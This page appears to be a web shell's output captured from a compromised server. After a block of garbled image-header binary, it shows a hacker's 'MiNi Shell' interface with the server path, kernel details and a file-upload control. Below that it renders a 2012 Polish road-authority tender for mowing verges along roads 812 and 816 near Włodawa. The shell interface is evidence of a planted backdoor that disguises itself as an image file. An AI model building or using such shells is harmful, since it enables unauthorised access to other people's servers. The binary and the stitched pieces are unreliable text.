JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120417/86511-N-2012.html

<p class="kh_header"><b>Włodawa: Koszenie traw chwastów oraz wycinka samosiewów, odrostów i krzaków  w pasach drogowych dróg wojewódzkich:
1) Nr 812 Biała Podlaska-Wisznice-Włodawa-Chełm
2) Nr 816 Terespol-Kodeń-Sławatycze-Włodawa-Dorohusk-Zosin</b><br>
<b>Numer ogłoszenia: 86511 - 2012; data zamieszczenia: 17.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Koszenie traw chwastów oraz wycinka samosiewów, odrostów i krzaków  w pasach drogowych dróg wojewódzkich:
1) Nr 812 Biała Podlaska-Wisznice-Włodawa-Chełm
2) Nr 816 Terespol-Kodeń-Sławatycze-Włodawa-Dorohusk-Zosin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na:

	Jednokrotnym koszeniu traw chwastów oraz wycince samosiewów odrostów i krzaków  w pasach drogowych dróg wojewódzkich Nr 812 i Nr 816

1. Zakres usług obejmuje:
1.1. Zadanie Nr 1; 
1.1.1. Jednokrotne koszenie traw i chwastów oraz wycinka samosiewów, odrostów
     i   krzaków w pasie drogowym drogi wojewódzkiej Nr 812 Biała Podlaska - Wisznice -
     Włodawa -  Chełm od km 37+200 do km 99+430
     w tym:
              - trawy i chwasty  - 988 720,00  m2
              - samosiewy i odrosty - 99 225,00 m2
              - krzaki średniej gęstości - 4 705,00 m2
    zgodnie z przedmiarem i wymaganiami określonymi w  Specyfikacji Technicznej 
    w sposób gwarantujący należytą jakość.

1.1.2.  Przed przystąpieniem do koszenie Wykonawca usunie pasa drogowego kamienie, gruz, puszki, butelki, papiery  itp., a następnie wywiezie je we własnym zakresie i na swój koszt na składowisko odpadów, lub przekaże firmie zajmującej się utylizacją odpadów.  
    
 1.2. Zadanie Nr 2; 
   1.2.1. Jednokrotne koszenie traw i chwastów oraz wycinka samosiewów i odrostów
      w pasie  drogowym drogi  wojewódzkiej Nr 816 Terespol - Kodeń - Sławatycze - 
      Włodawa - Dorohusk - Zosin od km 19+100 do km 59+300 
      i od km 63+240 do km 115+380
    w tym:
               - trawy i chwasty - 912 945 m2
               - samosiewy i odrosty - 78 285 m2
   zgodnie z przedmiarem i wymaganiami określonymi w  Specyfikacji Technicznej 
   w  sposób gwarantujący należytą jakość.
   2) Przed przystąpieniem do koszenie Wykonawca usunie z pasa drogowego kamienie, 
       gruz, puszki, butelki, papiery  itp., a następnie wywiezie je we własnym zakresie i na
       swój koszt na składowisko odpadów, lub przekaże firmie zajmującej się utylizacją
       odpadów.  
2. Zamawiający zastrzega sobie możliwość zmniejszenia zakresu zamówienia.
3.  Koszenie powinno odbywać się w sposób mechaniczny przy użyciu kosiarki
      bijakowej , a pod barierami, przy ogrodzeniach, znakach, pachołkach i innych
     urządzeniach drogowych przy użyciu kos spalinowych na wysięgniku.
4.  Wysokość traw, chwastów oraz samosiewów, odrostów i krzaków po skoszeniu/wycince
     nie  może być większa niż 5 cm.
5.  Wycięte odrosty, samosiewy i krzaki należy rozdrobnić przy użyciu rębaka, lub wywieźć. 
6.  Decyzję o konieczności przystąpienia do wykonania usługi podejmować będzie
     Kierownik Rejonu Dróg Wojewódzkich we Włodawie.
7.  Wezwanie zespołów roboczych Wykonawcy nastąpi pisemnie lub faksem  na 7 dni
     przed koniecznością  przystąpienia do wykonania usługi.
8.  Wykonawca zabezpieczy we własnym zakresie i na swój koszt sprzęt niezbędny do  realizacji zamówienia.
9. Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych). 
     Za rozwiązania równoważne uznana będzie oferta na wykonanie usług przy użyciu sprzętu innego niż określony w Specyfikacji Technicznej pod warunkiem, że jego parametry nie będą gorsze niż określone w ST.
10. Ponadto Wykonawca zobowiązany jest do: 
        1) zapewnienia bezpiecznych warunków ruchu drogowego, kołowego
            i pieszego, w rejonie prowadzonych robót objętych umową, na podstawie 
            sporządzonego we własnym zakresie, zgodnie z obowiązującymi przepisami, 
            projektu organizacji ruchu ( na czas prowadzonych robót ) zatwierdzonego 
            przez Zarządzającego  ruchem na drogach wojewódzkich tj. Dyrektora ZDW     
            w Lublinie.     
  2) wyposażenie pracującego sprzętu w lampy ostrzegawcze (pulsujące) koloru 
             żółtego oraz pracowników w kamizelki ostrzegawcze z elementami odblaskowymi.
Szacunkowa Wartość zamówienia netto: Zadanie Nr 1 - 105 585,90 PLN, Zadanie Nr 2 - 91179,90 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5, 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub
    czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania zostanie
    spełniony, jeżeli Wykonawca wykaże się posiadaniem ważnego dokumentu
    uprawniającego do prowadzenie działalności w zakresie zbierania i  transportu
    odpadów. Ocena spełniania warunku będzie dokonywana w następujący sposób: 
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie spełniony, jeżeli Wykonawca
        wykaże, że w ciągu ostatnich 3 lat przed upływem terminu do składania ofert, a jeżeli
        okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej
        1 usługę obejmującą swoim zakresem koszenie poboczy dróg, nasypów, skarp,
         rowów, pasów drogowych, wałów ochronnych, trawników o wartości minimum 40 000,00 zł. brutto.
Ocena spełniania warunku będzie dokonywana w następujący sposób: 
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym zostanie spełniony
    jeżeli Wykonawca wykaże się dysponowaniem niżej wymienionymi jednostkami
    sprzętowymi i transportowymi:
1.Kosiarka bijakowa - 1 szt./zadanie
2.Kosa spalinowa na wysięgniku - 2 szt./zadanie
3.Ciągnik z przyczepą lub samochód ciężarowy - 1 szt./zadanie  
4.Rębak do gałęzi - 1 szt. (dotyczy zadania Nr 1)
Ocena spełniania warunku będzie dokonywana w następujący sposób: 
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca oświadczy
         w formie pisemnej , że spełnia warunki, o których mowa w art. 22 ust. 1 ustawy Pzp.
Ocena spełniania warunku będzie dokonywana w następujący sposób: 
    spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń lub dokumentów, które należy dołączyć w celu
     potwierdzenia spełniania warunków udziału w postępowaniu  Wykonawca obowiązany
     jest dołączyć do oferty:
1)	Ofertę przetargową (z ceną netto i z podatkiem VAT) 
    wraz z załącznikiem do oferty (formularz cenowy) 2)	Zgodę/umowę na przyjęcie zebranych odpadów na składowisko odpadów.
3)	Wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcy  4)	Podpisany wzór umowy 5)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
     do oferty należy dołączyć dokument (np. odpowiednią umowę) ustanawiający 
     pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia 
     albo reprezentowania w postępowaniu i zawarcia umowy   w sprawie zamówienia
     publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych;
6)	W przypadku podpisania oferty i innych dokumentów  przez osobę/osoby,  które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby 
      podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje
      możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty,
      polegających na:
1)	Zmianie wynagrodzenia w przypadku zmiany stawek podatku VAT. 
2)	Zmianie terminu wykonania umowy w przypadku wystąpienia niekorzystnych warunków atmosferycznych (długotrwałe obfite opady deszczu uniemożliwiające 
      wykonywanie usługi). Na okoliczność wystąpienia niekorzystnych warunków
      atmosferycznych osoba nadzorująca ze strony Zamawiającego wykonanie umowy
      sporządza stosowny protokół podpisany przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60
 pokój nr 2 w godz. 07:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2012 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60 w pokoju nr 15 (sekretariat).      
Otwarcie ofert dnia 26/04/2012 godz 09:10 pokój Nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują faksem na nr 82 572 17 93; 572 41 62 lub drogą elektroniczną na adres  e-mail: rdw.wlodawa@zdw.lublin.pl.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej  niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się  z Wykonawcami:
1)	W sprawach technicznych - Krystyna Kowalewska  tel. (82 572 19 52)
2)	W sprawach formalno -prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk tel. (82 572 16 35), 
      Eugeniusz Kiewczykowski  tel. (82 572 16 35)
 UWAGA!
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o  przesłanie  krótkiej informacji zawierającej podstawowe dane firmy (nazwa, adres, nr telefonu, faxu, adres poczty elektronicznej) faksem nr 82 572-17-93; 82 572-41-62 
lub drogą elektroniczną na adres: rdw.wlodawa@zdw.lublin.pl.
Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego bezpośrednio zawiadamiani o np.: zapytaniach, wyjaśnieniach  i zmianach dotyczących Specyfikacji Istotnych Warunków Zamówienia,  przedłużeniu terminu składania ofert. 
Pouczenie o środkach ochrony prawnej przysługujących wykonawcy w toku postępowania o udzielenie zamówienia
1.  Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności
     zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania 
     czynności, do której zamawiający jest zobowiązany na podstawie ustawy.
2.  Odwołanie przysługuje zgodnie z art. 180 ust. 2 ustawy Prawo zamówień publicznych 
     (Dz. U. z 2010 r.  Nr 113 poz. 759 z późn. zmian.) wyłącznie wobec czynności:
     1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
     2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
     3) odrzucenia oferty odwołującego.
3.  Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, 
     której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie 
     zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne 
     uzasadniające wniesienie odwołania. 
4. Odwołanie wnosi się do Prezesa Izby w formie pisemnej albo elektronicznej opatrzonej
     bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego 
     kwalifikowanego certyfikatu.
5. Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do
    wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed
    upływem tego terminu. Domniemywa się, iż Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu na jego wniesieni, jeżeli przesłanie jego kopii nastąpiło przed upływem na jego wniesienie za pomocą jednego ze sposobów określonych 
    w art. 27 ust. 2 ustawy.
6. Zgodnie z art. 182 ust. 1 pkt. 2) odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o o czynności zamawiającego stanowiącej podstawę jego wniesienia  - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób.
7. Zgodnie z art. 182 ust 2 pkt. 2 odwołanie wobec treści ogłoszenia o zamówieniu wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej.
8. Odwołanie wobec czynności innych niż określone w pkt. 6 i 7 wnosi się w terminie 5 dni od dnia, w którym  powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.
9. Jeżeli Zamawiający nie przesłał Wykonawcy zawiadomienia o wyborze najkorzystniejszej oferty odwołanie wnosi się w terminie 15 dni od dnia zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenie o udzieleniu zamówienia.
10. Jeżeli Zamawiający nie zamieścił w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia odwołanie wnosi się w terminie 1 miesiąca od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.1. Zadanie Nr 1; 
1.1.1. Jednokrotne koszenie traw i chwastów oraz wycinka samosiewów, odrostów
     i   krzaków w pasie drogowym drogi wojewódzkiej Nr 812 Biała Podlaska - Wisznice -
     Włodawa -  Chełm od km 37+200 do km 99+430.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednokrotne koszenie traw i chwastów oraz wycinka samosiewów, odrostów
     i   krzaków w pasie drogowym drogi wojewódzkiej Nr 812 Biała Podlaska - Wisznice -
     Włodawa -  Chełm od km 37+200 do km 99+430
     w tym:
              - trawy i chwasty  - 988 720,00  m2
              - samosiewy i odrosty - 99 225,00 m2
              - krzaki średniej gęstości - 4 705,00 m2
    zgodnie z przedmiarem i wymaganiami określonymi w  Specyfikacji Technicznej 
    w sposób gwarantujący należytą jakość.

1.1.2.  Przed przystąpieniem do koszenie Wykonawca usunie pasa drogowego kamienie, gruz, puszki, butelki, papiery  itp., a następnie wywiezie je we własnym zakresie i na swój koszt na składowisko odpadów, lub przekaże firmie zajmującej się utylizacją odpadów.  
Szacunkowa wartość zadania netto: 105585,90 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 1.2. Zadanie Nr 2; 
   1.2.1. Jednokrotne koszenie traw i chwastów oraz wycinka samosiewów i odrostów
      w pasie  drogowym drogi  wojewódzkiej Nr 816 Terespol - Kodeń - Sławatycze - 
      Włodawa - Dorohusk - Zosin od km 19+100 do km 59+300 
      i od km 63+240 do km 115+380.</p>
